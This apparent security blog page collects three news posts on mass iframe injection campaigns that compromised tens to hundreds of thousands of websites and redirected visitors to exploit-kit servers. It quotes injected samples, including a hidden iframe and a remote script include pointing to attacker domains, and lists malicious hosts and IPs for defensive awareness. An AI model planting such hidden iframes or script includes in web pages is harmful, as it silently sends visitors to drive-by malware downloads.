Search This Blog

Showing posts with label Mass IFrame Injection. Show all posts

Mass Iframe injections used to drive traffic | Traffic Direction System[TDS]


Security Researchers of Sophos noticed the rise in the volume of Mal/Iframe-Gen detections. A Number of sites infected using the Iframe Injection technique. These infected sites are used to drive traffic to another websites(mostly malware sites).


Despite the obfuscation, Sophos products proactively block these malicious scripts as Mal/Iframe-Gen. As suggested from the threat name, the payload of the injected script is to write an iframe to the page:

The iframe points to what appears to be a 'middleman' server, used to bounce the traffic elsewhere. This is commonly known as a Traffic Direction System (TDS). The TDS server is under the control of the attackers, enabling them to configure it to redirect user traffic to wherever required.

At first the Iframe Injection redirects to a freshly registered domain (hosted in Germany). However, the page was unavailable, with all requests getting a 404 error. This was a little surprising given that the attack was new (you expect 404s for old, stale attacks where the compromised sites persist long after the target payload servers have been shut down).

Later the TDS server was updated to redirect the traffic to a new destination. At the time of writing it is redirecting the traffic to a Blackhole exploit pack site, where the victim is bombarded with the usual Flash, Java and PDF exploits.

The illustration below gives an overview of this attack, and the role that the TDS server plays in it.

This attack provides us with a perfect illustration of how user traffic is a commodity. Once they have injected numerous sites to redirect to their TDS, the attacker can essentially sell that user traffic to interested parties, willing to pay for victims to hit their exploit sites.

As ever, protection from this form of attack consists of several components:
  • detection of the malicious redirects injected into the legitimate sites (in this case, proactive detection as Mal/Iframe-Gen).
  • URL filtering to block requests to the TDS. Thus far, a few different servers are being used in these attacks.
  • URL filtering to block requests to the final destination servers.
  • detection of the exploit site itself (Mal/ExpJS-N) and the various malicious files it uses.
  • detection of the final payload (which will vary as the final destination server changes).
  • if all else has failed, runtime protection (HIPs) to catch the malicious payload running on the victim's machine.

Another Mass IFrame Injection Attack |350,000 ASP sites infected

 Another Mass Iframe Injection Attack detected by armorize.com Researchers.  On july, They detected the Mass Iframe injection that infected the 90000 websites. Looks like this time the number of sites is increased.   350,000 websites infected by Malware.  Also they targeted the website that are developed using ASP.net.


As per the Google result, there is 180,000 websites infected by this Iframe injection attack. They targeted victims who use 6 particular language:English, German, French, Italian, Polish, and Breton in their websites.
If you want to check the list of Infected sites, then do google search as "http://jjghui.com/urchin.js".  Never click the website that return by google after this search.  It will launch the malware attack.

Malware Infection:
The Malicious scripts inserted inside the victims website causes the visiting browser to load an iframe first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu.
Multiple browser-based drive-by download exploits are served depending on the visiting browser.

When the user is redirected to the malware server, it will server to the visitors. The malware will be automatically installed without your knowledge. This is if they have outdated browsing platforms (browser or Adobe PDF or Adobe Flash or Java etc).

Currently, the 6 out of 43 antivirus vendors on VirusTotal can detect the dropped malware.

jjghui.com resolves to IP 146.185.248.3 (AS3999), which is in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352), which is in the US and hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to IP 67.208.74.71 (AS33597), which is in the US and hosted by InfoRelayOnlineSystems.

The dropped malware attempts to connect to: 65.98.83.115 (AS25653), which is in the US.


IFrame Injection:
They inserted the Iframe inside the webpage using the web application vulnerability. like this:
<script src="Link_to_malicious_script"></script>

This inserts the malicious javascript inside website.  This malicious script generates an iframe to www3.strongdefenseiz.in, which gives an HTTP 302 redirect to the exploit server at www2.safetosecurity.rr.

Security Tips from BreakTheSecurity.com to Web Masters:
If your site also infected, then delete all files from your server. I hope you have backup of your website contents. Install the Latest Antivirus in your system. Verify your code before uploading.

90000 Web Pages Infected by Mass IFrame Injection

Security Experts Wayne Huang, Chris Hsiao, NightCola Lin discovered the Massive Iframe attack on commerce websites. There is more than 90000 websites infected by this attack. All infected websites pointing to willysy.com.

Google indicates more than 90,000 infected pages (note it's pages not domains)


Massive Injection:
initially it was:

<iframe src="hxxp://willysy.com/images/banners/" style="position: absolute; visibility: hidden;"></iframe>

Later it became:
<script src="hxxp://exero.eu/catalog/jquery.js">
</script>

As per armorize, the infected websites redirected to some other malware domain and downloads malwares to client system.

Screenshots of Infected Pages:




Video :


source:armorize